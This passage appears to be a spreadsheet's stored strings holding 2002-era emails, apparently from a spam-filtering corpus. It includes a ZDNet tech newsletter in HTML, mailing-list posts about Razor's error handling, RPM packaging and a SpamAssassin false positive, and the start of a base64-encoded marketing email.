 lor: #FF0000"&gt;Click HERE&lt;/a&gt;
                 and then click send, and you will be removed within three =
 business days.
                 Thank You and we apologize for ANY inconvenience.&lt;/font&gt;&lt;/=
 td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAFGHOIPffACEH5fCAiR"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href="http://clickthru.online.com/Click?q=25-inepIbdXXmk_vx5ZTscR7jeQrFPR"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15, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;!--LEDE ART--&gt;		
 &lt;table cellpadding=0 cellspacing=0 border=0 align=left&gt;
 &lt;tr valign=top&gt;&lt;td width="90"&gt;&lt;img src="http://www.zdnet.com/techupdate/i/dberlind.gif" width="85" height="110" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
  &lt;/table&gt;
 &lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8qPoyA7JR1rqAFZcCnR" &gt;
 &lt;b&gt;Bridging the gap between Liberty and Microsoft&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It appears that we are closer to a solution for single sign-on and identity management. But what if Microsoft chooses not to support  Liberty's specifications?
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vXOSE-8g-rrsLKFK0uR" &gt;
 	 &lt;b&gt;Let's look at the worst-case scenario&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZMnM_ZNGWF8w6YrPhsR" &gt;White House reviews security backbone&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9L3QXiXmFz_e0CvgpaFR" &gt;HP deletes e-business software&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTajMyUPDuYWD0V_Wy4R" &gt;Breaking the wireless speed barrier?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYIeGl7fQffN5r5ls4rR" &gt;Pentium 4 to power Dell budget PCs&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXpeBpSh8FdMkmoOwzlR" &gt;AMD chips at mobile, flash markets&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOoJLDku3ufz1Jey2fP4R" &gt;Norway cancels Microsoft contract&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8Av_Y8N-JM2mPpt29erR" &gt;Hackers challenge Internet monitoring&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnXibFQHpiaRL6DCwoliR"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color="#990000"&gt;&lt;b&gt;Farber's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src="http://image.com.com/techupdate/i/dfarber.jpg" width="85" height="110" border="0"&gt;
 &lt;BR&gt;
 &lt;div align="center"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 Dan&lt;br&gt;Farber&lt;/font&gt;&lt;/div&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/dots75.gif" width=75 height=5&gt;
                 &lt;/td&gt;
                 &lt;td width=10&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Microsoft stresses security for Exchange&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Microsoft is readying a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds. The upcoming version, the company's first major update of the product since releasing Exchange 2000 nearly two years ago, will by default &lt;b&gt;disable certain messaging features&lt;/b&gt; to prevent hackers and virus makers from taking advantage of openings. While Microsoft's biggest nemesis in the e-mail and messaging market is &lt;b&gt;Lotus&lt;/b&gt;, the company also competes against &lt;b&gt;Novell&lt;/b&gt; and newcomer &lt;b&gt;Oracle&lt;/b&gt;, which plans to release its own e-mail and messaging software later this year. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGv1Co_Nv0T0QkY6b7PR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;IBM puts more bite in 'Shark'&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Can IBM's release of a new top-end "Shark" &lt;b&gt;enterprise storage system&lt;/b&gt; boost the company's prospects in the depressed storage market? Big Blue has fixed many early Shark problems, improving everything from data transfer capabilities to cache size, and adding &lt;b&gt;RAID 10 support&lt;/b&gt; and Eliza self-healing features. But IBM faces the still dominant &lt;b&gt;EMC&lt;/b&gt;, which last week lured away Mark Lewis from HP to become its new CTO; and &lt;b&gt;Hitachi&lt;/b&gt;, which  still boasts the technology edge. IBM's edge is its ability to bundle Shark sales with related server and service deals.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_lbyUfuo4I9yc99NcnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Report: Linux hack attacks on the rise&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Hackers are increasingly targeting Linux-based Web servers, while the number of successful attacks on &lt;b&gt;Windows&lt;/b&gt; systems has decreased, according to a new report.  Linux server applications are often vulnerable to attack because of &lt;b&gt;mismanagement&lt;/b&gt;, according to the study, which urges Linux system administrators to be more vigilant about patching known security bugs. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4eb1WRhQ93KjZ6eJcneR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Frethem worm variant:  "Re: Your password!"&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 An e-mail message that promises to reveal &lt;b&gt;secret information&lt;/b&gt; with a password is a variant from the pesky Frethem worm family. Frethem.k (aka w32.frethem.k@mm) is a more robust version of Frethem.e, which uses its own SMTP engine to send e-mail using addresses obtained from infected systems. Mac and Linux users are not affected. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbk_UDdrAu7hgvo2AKesR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071502sonyclie.jpg" width="200" height="291" border="0"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;An improved CLIE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With the CLIE PEG-T665C, Sony took everything good about the PEG-T615C--including its terrific color screen and solid design--and added a faster processor and MP3 support to make quite an &lt;b&gt;attractive Palm OS PDA&lt;/b&gt;. But with Pocket PCs now selling for less than this CLIE and a whole new Palm OS on the horizon, is this the right time to invest in the T665C?
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOBJaylG9TmIKJ15BRdR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;!--&lt;font size="+1"&gt;&lt;b&gt;IT sees new profits in Old Glory&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Can CRM be tweaked to track terrorists? As the fight against &lt;b&gt;terrorism&lt;/b&gt; heats up, the government turns to the tech industry to come up with tools to secure the country against attack. It's an opportunity for patriotism--and for profits. (Nearly $38 billion is slated for homeland security.) Software companies big and small are sending tens of thousands of proposals to 
 government agencies, some of which are so new they don't have the budget to hire people to evaluate them all.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMkQo7Ux31g9NPmdZPuR" &gt;
 &lt;b&gt;Read more the ZDNet News Focus&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhMWFvk2VFm8il40AWNyR"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href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKI2GKzcdGkeHaXeD3gBlR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=b6-llkUQCKyZLdFrcbT_PUCch20Lg4R" &gt;
 &lt;b&gt;Handle employee relations with care&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 ERM is the latest relationship management buzzword. &lt;b&gt;Adrian Mello&lt;/b&gt; helps you get beyond the marketing hype by weighing the merits of employee portals.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Downloads&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq562XqIQ7qeZDozn6f5yR" &gt;
 &lt;b&gt;How to defrag your hard drive--and speed up your PC&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Looking for a quick way to rev up a sluggish system? Try defragmenting your hard drive. Since the Windows defrag tool is less than ideal, &lt;b&gt;Preston Gralla&lt;/b&gt; shows you three downloads that do a better job of it.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EzJkOAuPhsYK3Awi9qlR" &gt;
 &lt;b&gt;Unplugged: FBI CIO Darwin John&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the twilight of his career, an IT veteran takes on the formidable task of transforming the FBI's &lt;b&gt;antiquated technology infrastructure&lt;/b&gt;.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrV7tXLAtYYRGOT9_Jmp4R" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zFF2D66GftmZCtvxYhrR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEnRviy5tR-pp7us2QfiR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzinohlvSKNXLTSyPWc3PR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJhDUcERsxoLkkTKhn-dR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_uvjR6i6fez6pa6cIJuR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSX0p7Ey_RYG8Y0gSPZxsR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1jabpVqrkUMBXB6W5WWlR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBdt8aEYlcGhVIlcU_eR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubFOfpSqJzDxDXozLCyR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBHgu4W1jg0SxiPZvH6lR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawpW-tEQtTbDS-BJjho4R" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQs3hMSvCs3CyJqsjeorR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBeeaKm5g3F-erCpGY9iR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;P&gt;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href='http://clickthru.online.com/Click?q=1d-6KwjzDQ7qgKhrDEQ2oJXCf-zCfymhRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHkttRDDFWVhZSgRXBnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBskdQCyNWXl_kj2ZBSJuRR"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href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdpAgMIobvZm5yGKIaZR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKERRRgVrqMtNXjoCKqdR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL88ZNUieplrQ8kasp4eR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyWiy_E1lXdIl9Oi-UiyR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddxlbWSMr9i_f_B0NLnlR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsFFGhgkWdT_pfmeDx04R" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb1buw3AvpmtTwxp6DtrR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZEdeOXH3XX8owMnerlR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDUSF6Nmap_vCgSyiL4R"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=1c-csTinZr9A8qvweKWtSz44jD6RdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] use of exit in razor modules
</t>
  </si>
  <si>
    <t xml:space="preserve">Every once in a while, I get notifications in my root mailbox that my
 personal mail is being rejected.  The message is 'No Catalogue Servers
 available at this time.'  Since I use razor V1 through Mail::Audit
 (using is_spam), I tried several ways to try to trap this error and
 allow my mail to be delivered on these occassions but nothing seemed
 to work.
 I started digging through the code and found several uses of exit
 inside the razor code.  This is a very anti-social thing for a module
 to do.  It takes away my option to bypass the spam check and deliver
 the mail anyway.  The razor modules should signal errors through die
 or warn.  razor-check could catch these and, knowing it's being called
 during mail delivery, issue an appropriate message and exit status for
 the MTA.  The razor modules don't know who's calling them and
 shouldn't make this decision.  I'm wondering how much legitimate mail
 I'm missing because of this.
 I certainly hope this is being addressed in the new version.
 -- 
 tom_p
 pfau@nbpfaus.net -- http://www.nbpfaus.net/~pfau/
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 16, 2002 at 07:58:07PM +0200, Torsten Bronger wrote:
 &gt; If I create an RPM according to one of the how-to's with having Red
 &gt; Hat in mind, how big are my chances that it will also work for the
 &gt; SuSE distribution, or others?  (I don't know how many base on the RPM
 &gt; system.)
 &gt; Or what must I pay attention to when creating an RPM that should work
 &gt; with the big distributions?
 Note also that there's hope of rpm being used on other systems than
 Linux.
 Look at
 http://www-1.ibm.com/servers/aix/products/aixos/linux/download.html
 I think a good way to guess is to look at others' spec files, hardcode
 as little as possible, replace abolute paths and commands with macros
 if possible and accept and request patches and suggestions :)
 -- 
 Designing in C, I find myself utilizing the Harley Davidson Design
 Principle: "If it breaks, make it bigger. If it sticks out, chrome it!" :-)
 		-- Marin David Condic, comp.lang.ada
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">"SpamAssassin Killed My Independence Day Party"
 With all the spam that gets through, I had no idea
 a filter was in effect at the FoRK listserv. 
 Turn it off! It not only risks silent false 
 positives, but suffers them in such a way that 
 individuals cannot adjust/detect/remedy them. 
 Also, anti-spam startups need end-users. 
 Centralized spam fighting takes food out
 of those coders' mouths!
 I still think self-add whitelists are underrated. 
 A FoRK whitelist would presumably start with
 all subscribers, and grow from there. Bouncing
 problem mail, in a way that humans can understand
 how to whitelist themselves for a resend, avoids 
 the problem of silent failures without opening the 
 door to lazy, forged-"from" spammers. 
 - Gordon
 ----- Original Message ----- 
 From: "Rohit Khare" &lt;khare@alumni.caltech.edu&gt;
 To: &lt;fork@spamassassin.taint.org&gt;
 Sent: Tuesday, July 23, 2002 12:25 PM
 Subject: Re: HD/ID: High-Def Independence Day
 &gt; On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote:
 &gt; &gt; You're all invited to join me for a South Bay Hi-Def spectacle at my 
 &gt; &gt; apartment in Sunnyvale on the Fourth!
 &gt; 
 &gt; So here's the final report on the HD/ID party. As no less than TEN 
 &gt; forkers pointed out, the invitation, while sent on Sunday 6/30, was only 
 &gt; delivered ten days later on 7/9.
 &gt; 
 &gt; It got flagged as spam.
 &gt; 
 &gt; Yes, on a mailing list awash in crap -- and some it is even unsolicited 
 &gt; commercial email, heavens! -- our trusty mailman filters captured and 
 &gt; quarantined just two posts that week, one from me that was &gt; 100K (the 
 &gt; fat articles) and one that was bcc:d (the invite).
 &gt; 
 &gt; Now, it was a little difficult to recalibrate self-esteem, which as you 
 &gt; can imagine was proportional to the two-digit attendance  -- in binary!
 &gt; 
 &gt; According to the George Washington documentary, I almost had as much 
 &gt; alcohol on hand than he did -- Virginia tradition being to copiously 
 &gt; lubricate each voter. Election day was a public festival day, and it 
 &gt; cost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER 
 &gt; that day...
 &gt; 
 &gt; So, herewith is the prize for most appropriate flame my delayed invite 
 &gt; got:
 &gt; 
 &gt; &gt; I unfortunately will have had other plans and thus will
 &gt; &gt; not be able to have made it.  Yes.
 &gt; &gt;
 &gt; &gt; -faisal
 &gt; 
 &gt; One of our competitors added:
 &gt; &gt; Wow - I just got this now - I guess that was KnowLate!
 &gt; 
 &gt; And there is no prize for guessing which cold, dark forks emitted these 
 &gt; two plaints:
 &gt; 
 &gt;  From Whiny Dwarf:
 &gt; &gt; Fix your mail server! just a bit late!
 &gt; 
 &gt; And Angry Dwarf:
 &gt; &gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now! 
 &gt; &gt; Fuck! Fuck! Fuck!
 &gt; &gt;
 &gt; &gt; We would have been there if I had seen the message before. Kuso! (as 
 &gt; &gt; the Japanese would say).
 &gt; &gt;
 &gt; &gt; Fuck.
 &gt; &gt; Fuck.
 &gt; &gt; Fuck.
 &gt; &gt; Fuck.
 &gt; &gt; Fuck.
 &gt; &gt; Fuck.
 &gt; 
 &gt; Perhaps I should remind the latter gently that it was not in any way his 
 &gt; fault. The universe *was* out to get him!
 &gt; 
 &gt; And finally, here's an object lesson for all ye of little faith to learn 
 &gt; from my sins:
 &gt; 
 &gt; &gt; SpamAssassin rated it spam (barely). Gotta stop
 &gt; &gt; using those "words and phrases which indicate porn" :-)
 &gt; 
 &gt; Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if 
 &gt; you call the Great American Shrine a... "boob tube"
 &gt; 
 &gt; :-)
 &gt;    Rohit
 &gt; 
 &gt; PS. This is the obscure footnote where I actually hide the bits in this 
 &gt; post. What we just encountered here is that an event-processing system 
 &gt; with a 10-day RTT cannot be used to reliably handle events more often 
 &gt; than once every 20 days. That's why I waited to reply. six bonus points 
 &gt; to anyone who can prove this hunch of mine. Hint: try analyzing the 
 &gt; problem in frequency-domain.
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Espial TV Web Seminar Series - Register Today!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: multipart/alternative; 
 	boundary="----=_NextPart_84815C5ABAF209EF376268C8"
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset=US-ASCII
 Content-Transfer-Encoding: base64
 DQoNCg0KU1VCU0NSSVBUSU9OIElORk9STUFUSU9ODQoqKioqDQpZb3UgaGF2ZSByZWNlaXZlZCB0
 aGlzIGUtbWFpbCBiZWNhdXNlIHlvdSBhcmUgYW4gRURDIHJlZ2lzdHJhbnQgb3IgeW91IHByZXZp
 b3VzbHkgcmVxdWVzdGVkIGluZm9ybWF0aW9uIGZyb20gRXNwaWFsLiAgSWYgeW91IHdpc2ggdG8g
 YmUgcmVtb3ZlZCBmcm9tIHRoaXMgbGlzdCwgcGxlYXNlIHJlcGx5IHRvIGZhY2VsaXN0QGVzcGlh
